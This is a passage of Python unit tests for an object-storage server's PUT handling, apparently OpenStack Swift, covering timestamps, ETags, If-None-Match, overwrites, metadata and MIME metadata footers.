self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_PUT_invalid_path(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT',
'CONTENT_LENGTH': '0'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_invalid_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6',
'Content-Type': '\xff\xff'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('Content-Type' in resp.body)
def test_PUT_no_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
del req.headers['Content-Length']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 411)
def test_PUT_zero_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = ''
self.assertEqual(req.headers['Content-Length'], '0')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_bad_transfer_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
req.headers['Transfer-Encoding'] = 'bad'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_if_none_match_star(self):
# First PUT should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# File should already exist so it should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': next(self.ts).normal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_if_none_match(self):
# PUT with if-none-match set and nothing there should succeed
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': 'notthere'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT with if-none-match of the object etag should fail
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '0b4c12d7e0a73840c1c4f148fda3b037'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def test_PUT_if_none_match_but_expired(self):
inital_put = next(self.ts)
put_before_expire = next(self.ts)
delete_at_timestamp = int(next(self.ts))
time_after_expire = next(self.ts)
put_after_expire = next(self.ts)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': inital_put.normal,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT again before object has expired should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_before_expire.normal,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'TEST'
with mock.patch("swift.obj.server.time.time",
lambda: float(put_before_expire.normal)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
# PUT again after object has expired should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_after_expire.normal,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'TEST'
with mock.patch("swift.obj.server.time.time",
lambda: float(time_after_expire.normal)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_common(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'x-object-meta-test': 'one',
'Custom-Header': '*',
'X-Backend-Replication-Headers':
'Content-Type Content-Length'})
req.body = 'VERIFY'
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
self.object_controller.allowed_headers = ['Custom-Header']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]),
'p', hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '6',
'ETag': '0b4c12d7e0a73840c1c4f148fda3b037',
'Content-Type': 'application/octet-stream',
'name': '/a/c/o',
'X-Object-Meta-Test': 'one',
'Custom-Header': '*'})
    def test_PUT_overwrite(self):
        """A newer PUT replaces the object's data and all of its metadata."""
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '6',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        sleep(.00001)  # ensure the second PUT draws a strictly newer timestamp
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # the on-disk .data file is named for the second PUT's timestamp
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY TWO')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': utils.Timestamp(timestamp).internal,
                          'Content-Length': '10',
                          'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
                          'Content-Type': 'text/plain',
                          'name': '/a/c/o',
                          'Content-Encoding': 'gzip'})
    def test_PUT_overwrite_to_older_ts_success(self):
        """A PUT whose timestamp is newer than a prior DELETE succeeds and
        leaves a .data file named for the PUT's timestamp."""
        old_timestamp = next(self.ts)
        new_timestamp = next(self.ts)
        # DELETE of a not-yet-existing object returns 404
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': old_timestamp.normal,
                     'Content-Length': '0',
                     'Content-Type': 'application/octet-stream'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # a PUT with a newer timestamp than the DELETE is accepted
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': new_timestamp.normal,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            new_timestamp.internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY TWO')
        self.assertEqual(
            diskfile.read_metadata(objfile),
            {'X-Timestamp': new_timestamp.internal,
             'Content-Length': '10',
             'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
             'Content-Type': 'text/plain',
             'name': '/a/c/o',
             'Content-Encoding': 'gzip'})
    def test_PUT_overwrite_to_newer_ts_failed(self):
        """A PUT older than an existing tombstone is refused with 409 and
        must not even attempt to create a diskfile."""
        old_timestamp = next(self.ts)
        new_timestamp = next(self.ts)
        # DELETE at the newer timestamp; returns 404 (object never existed)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': new_timestamp.normal,
                     'Content-Length': '0',
                     'Content-Type': 'application/octet-stream'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # a PUT with an older timestamp than the DELETE must conflict
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': old_timestamp.normal,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        with mock.patch(
                'swift.obj.diskfile.BaseDiskFile.create') as mock_create:
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(mock_create.call_count, 0)
        # data file doesn't exist there (This is sanity because
        # if .data written unexpectedly, it will be removed
        # by cleanup_ondisk_files)
        datafile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            old_timestamp.internal + '.data')
        self.assertFalse(os.path.exists(datafile))
        # ts file still exists
        tsfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            new_timestamp.internal + '.ts')
        self.assertTrue(os.path.isfile(tsfile))
    def test_PUT_overwrite_w_delete_at(self):
        """A newer PUT overwrites an object that carried an X-Delete-At."""
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'X-Delete-At': 9999999999,
                     'Content-Length': '6',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        sleep(.00001)  # ensure the second PUT draws a strictly newer timestamp
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # the stored metadata reflects only the second PUT
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY TWO')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': utils.Timestamp(timestamp).internal,
                          'Content-Length': '10',
                          'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
                          'Content-Type': 'text/plain',
                          'name': '/a/c/o',
                          'Content-Encoding': 'gzip'})
    def test_PUT_old_timestamp(self):
        """A PUT at or before the stored timestamp returns 409 and reports
        the winning timestamp in X-Backend-Timestamp."""
        ts = time()
        orig_timestamp = utils.Timestamp(ts).internal
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': orig_timestamp,
                     'Content-Length': '6',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # identical timestamp: conflict
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': normalize_timestamp(ts),
                                     'Content-Type': 'text/plain',
                                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
        # older timestamp: also conflict
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': normalize_timestamp(ts - 1),
                                'Content-Type': 'text/plain',
                                'Content-Encoding': 'gzip'})
        req.body = 'VERIFY THREE'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
def test_PUT_new_object_really_old_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '-1', # 1969-12-31 23:59:59
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1', # 1970-01-01 00:00:01
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_object_really_new_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '9999999999', # 2286-11-20 17:46:40
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# roll over to 11 digits before the decimal
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '10000000000',
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_invalid_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain',
'ETag': 'invalid'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
def test_PUT_user_metadata(self):
    """X-Object-Meta-* headers on a PUT are persisted in the .data file's
    xattr metadata alongside the standard object metadata."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
                 'X-Object-Meta-1': 'One',
                 'X-Object-Meta-Two': 'Two'})
    req.body = 'VERIFY THREE'
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # Locate the on-disk .data file the object server should have written.
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                          hash_path('a', 'c', 'o')),
        utils.Timestamp(timestamp).internal + '.data')
    self.assertTrue(os.path.isfile(objfile))
    self.assertEqual(open(objfile).read(), 'VERIFY THREE')
    # Both user-meta headers must round-trip through the diskfile metadata.
    self.assertEqual(diskfile.read_metadata(objfile),
                     {'X-Timestamp': utils.Timestamp(timestamp).internal,
                      'Content-Length': '12',
                      'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
                      'Content-Type': 'text/plain',
                      'name': '/a/c/o',
                      'X-Object-Meta-1': 'One',
                      'X-Object-Meta-Two': 'Two'})
def test_PUT_etag_in_footer(self):
    """An Etag sent in a MIME metadata footer overrides the header Etag.

    The request body is a multipart MIME document: object data, then a
    footer document whose Content-MD5 validates the footer JSON.
    """
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'Etag': 'other-etag',  # wrong on purpose; footer wins
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    obj_etag = md5("obj data").hexdigest()
    footer_meta = json.dumps({"Etag": obj_etag})
    footer_meta_cksum = md5(footer_meta).hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "obj data",
        "--boundary",
        "Content-MD5: " + footer_meta_cksum,
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.etag, obj_etag)
    self.assertEqual(resp.status_int, 201)
    objfile = os.path.join(
        self.testdir, 'sda1',
        storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                          hash_path('a', 'c', 'o')),
        utils.Timestamp(timestamp).internal + '.data')
    with open(objfile) as fh:
        # only the first MIME document (the object data) is stored
        self.assertEqual(fh.read(), "obj data")
def _check_container_override_etag_preference(self, override_headers,
                                              override_footers):
    """Helper: PUT an object with etag-override values supplied via request
    headers and/or MIME footers, then assert the container update carries
    X-Etag 'update-etag' (i.e. the winning override).

    :param override_headers: extra headers merged into the PUT request
    :param override_footers: extra entries merged into the footer JSON
    """
    def mock_container_update(ctlr, op, account, container, obj, req,
                              headers_out, objdevice, policy):
        # capture what the object server would send to the container
        calls_made.append((headers_out, policy))
    calls_made = []
    ts_put = next(self.ts)
    headers = {
        'X-Timestamp': ts_put.internal,
        'Content-Type': 'text/plain',
        'Transfer-Encoding': 'chunked',
        'Etag': 'other-etag',
        'X-Backend-Obj-Metadata-Footer': 'yes',
        'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'}
    headers.update(override_headers)
    req = Request.blank(
        '/sda1/p/a/c/o', headers=headers,
        environ={'REQUEST_METHOD': 'PUT'})
    obj_etag = md5("obj data").hexdigest()
    footers = {'Etag': obj_etag}
    footers.update(override_footers)
    footer_meta = json.dumps(footers)
    footer_meta_cksum = md5(footer_meta).hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "obj data",
        "--boundary",
        "Content-MD5: " + footer_meta_cksum,
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    with mock.patch(
            'swift.obj.server.ObjectController.container_update',
            mock_container_update):
        resp = req.get_response(self.object_controller)
    self.assertEqual(resp.etag, obj_etag)
    self.assertEqual(resp.status_int, 201)
    self.assertEqual(1, len(calls_made))
    # whichever override won, the container update must carry it as X-Etag
    self.assertEqual({
        'X-Size': str(len('obj data')),
        'X-Etag': 'update-etag',
        'X-Content-Type': 'text/plain',
        'X-Timestamp': ts_put.internal,
    }, calls_made[0][0])
    self.assertEqual(POLICIES[0], calls_made[0][1])
def test_override_etag_lone_header_footer(self):
    """An etag override supplied alone — via either the backend or the
    sysmeta header name, as a request header or a MIME footer — is used
    for the container update.
    """
    self._check_container_override_etag_preference(
        {'X-Backend-Container-Update-Override-Etag': 'update-etag'}, {})
    self._check_container_override_etag_preference(
        {}, {'X-Backend-Container-Update-Override-Etag': 'update-etag'})
    self._check_container_override_etag_preference(
        {'X-Object-Sysmeta-Container-Update-Override-Etag':
         'update-etag'}, {})
    # NOTE: the original ended this statement with a stray trailing comma,
    # turning it into a useless one-element tuple expression; removed.
    self._check_container_override_etag_preference(
        {}, {'X-Object-Sysmeta-Container-Update-Override-Etag':
             'update-etag'})
def test_override_etag_footer_trumps_header(self):
    """When the same override name appears both as a request header and as
    a MIME footer, the footer value wins."""
    for name in ('X-Backend-Container-Update-Override-Etag',
                 'X-Object-Sysmeta-Container-Update-Override-Etag'):
        header_overrides = {name: 'ignored-etag'}
        footer_overrides = {name: 'update-etag'}
        self._check_container_override_etag_preference(
            header_overrides, footer_overrides)
def test_override_etag_sysmeta_trumps_backend(self):
    """The sysmeta override name beats the backend override name when both
    arrive through the same channel (both headers, or both footers)."""
    overrides = {
        'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
        'X-Object-Sysmeta-Container-Update-Override-Etag': 'update-etag',
    }
    # both supplied as request headers...
    self._check_container_override_etag_preference(dict(overrides), {})
    # ...and both supplied as MIME footers
    self._check_container_override_etag_preference({}, dict(overrides))
def test_override_etag_sysmeta_header_trumps_backend_footer(self):
    """A sysmeta override in the request headers beats a backend override
    delivered in the MIME footers."""
    self._check_container_override_etag_preference(
        {'X-Object-Sysmeta-Container-Update-Override-Etag': 'update-etag'},
        {'X-Backend-Container-Update-Override-Etag': 'ignored-etag'})
def test_override_etag_sysmeta_footer_trumps_backend_header(self):
    """A sysmeta override in the MIME footers beats a backend override
    delivered in the request headers."""
    self._check_container_override_etag_preference(
        {'X-Backend-Container-Update-Override-Etag': 'ignored-etag'},
        {'X-Object-Sysmeta-Container-Update-Override-Etag': 'update-etag'})
def test_PUT_etag_in_footer_mismatch(self):
    """If the footer Etag doesn't match the uploaded data, the PUT is
    rejected with 422 (Unprocessable Entity)."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    # footer claims the etag of "green" but the body is "blue"
    footer_meta = json.dumps({"Etag": md5("green").hexdigest()})
    footer_meta_cksum = md5(footer_meta).hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "blue",
        "--boundary",
        "Content-MD5: " + footer_meta_cksum,
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 422)
def test_PUT_meta_in_footer(self):
    """User meta and sysmeta supplied in MIME footers override the values
    of the same names supplied as request headers."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'X-Object-Meta-X': 'Z',  # superseded by footer value 'Y'
                 'X-Object-Sysmeta-X': 'Z',  # superseded by footer value 'Y'
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    footer_meta = json.dumps({
        'X-Object-Meta-X': 'Y',
        'X-Object-Sysmeta-X': 'Y',
    })
    footer_meta_cksum = md5(footer_meta).hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "stuff stuff stuff",
        "--boundary",
        "Content-MD5: " + footer_meta_cksum,
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # HEAD the object back: the footer values must be the ones stored
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp},
        environ={'REQUEST_METHOD': 'HEAD'})
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.headers.get('X-Object-Meta-X'), 'Y')
    self.assertEqual(resp.headers.get('X-Object-Sysmeta-X'), 'Y')
def test_PUT_missing_footer_checksum(self):
    """A footer document without a Content-MD5 header is a 400 Bad
    Request, even if the footer content itself is valid."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
    req.body = "\r\n".join((
        "--boundary",
        "",
        "obj data",
        "--boundary",
        # no Content-MD5
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 400)
def test_PUT_bad_footer_checksum(self):
    """A footer whose Content-MD5 doesn't match the footer bytes is
    rejected with 422."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    footer_meta = json.dumps({"Etag": md5("obj data").hexdigest()})
    # checksum computed over footer_meta + "bad" so it cannot match
    bad_footer_meta_cksum = md5(footer_meta + "bad").hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "obj data",
        "--boundary",
        "Content-MD5: " + bad_footer_meta_cksum,
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 422)
def test_PUT_bad_footer_json(self):
    """Footer bytes that checksum correctly but aren't valid JSON produce
    a 400 Bad Request."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    # garbage that is definitely not parseable as JSON
    footer_meta = "{{{[[{{[{[[{[{[[{{{[{{{{[[{{[{["
    footer_meta_cksum = md5(footer_meta).hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "obj data",
        "--boundary",
        "Content-MD5: " + footer_meta_cksum,
        "",
        footer_meta,
        "--boundary--",
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 400)
def test_PUT_extra_mime_docs_ignored(self):
    """MIME documents after the footer are ignored, but the server still
    consumes the whole request body off the wire."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o',
        headers={'X-Timestamp': timestamp,
                 'Content-Type': 'text/plain',
                 'Transfer-Encoding': 'chunked',
                 'X-Backend-Obj-Metadata-Footer': 'yes',
                 'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
        environ={'REQUEST_METHOD': 'PUT'})
    footer_meta = json.dumps({'X-Object-Meta-Mint': 'pepper'})
    footer_meta_cksum = md5(footer_meta).hexdigest()
    req.body = "\r\n".join((
        "--boundary",
        "",
        "obj data",
        "--boundary",
        "Content-MD5: " + footer_meta_cksum,
        "",
        footer_meta,
        "--boundary",
        "This-Document-Is-Useless: yes",
        "",
        "blah blah I take up space",
        "--boundary--"
    ))
    req.headers.pop("Content-Length", None)
    resp = req.get_response(self.object_controller)
    self.assertEqual(resp.status_int, 201)
    # swob made this into a StringIO for us
    wsgi_input = req.environ['wsgi.input']
    # the input must be fully consumed (read to the very end)
    self.assertEqual(wsgi_input.tell(), len(wsgi_input.getvalue()))
def test_PUT_user_metadata_no_xattr(self):
    """If the filesystem doesn't support xattrs, PUT fails with
    507 Insufficient Storage."""
    timestamp = normalize_timestamp(time())
    req = Request.blank(
        '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
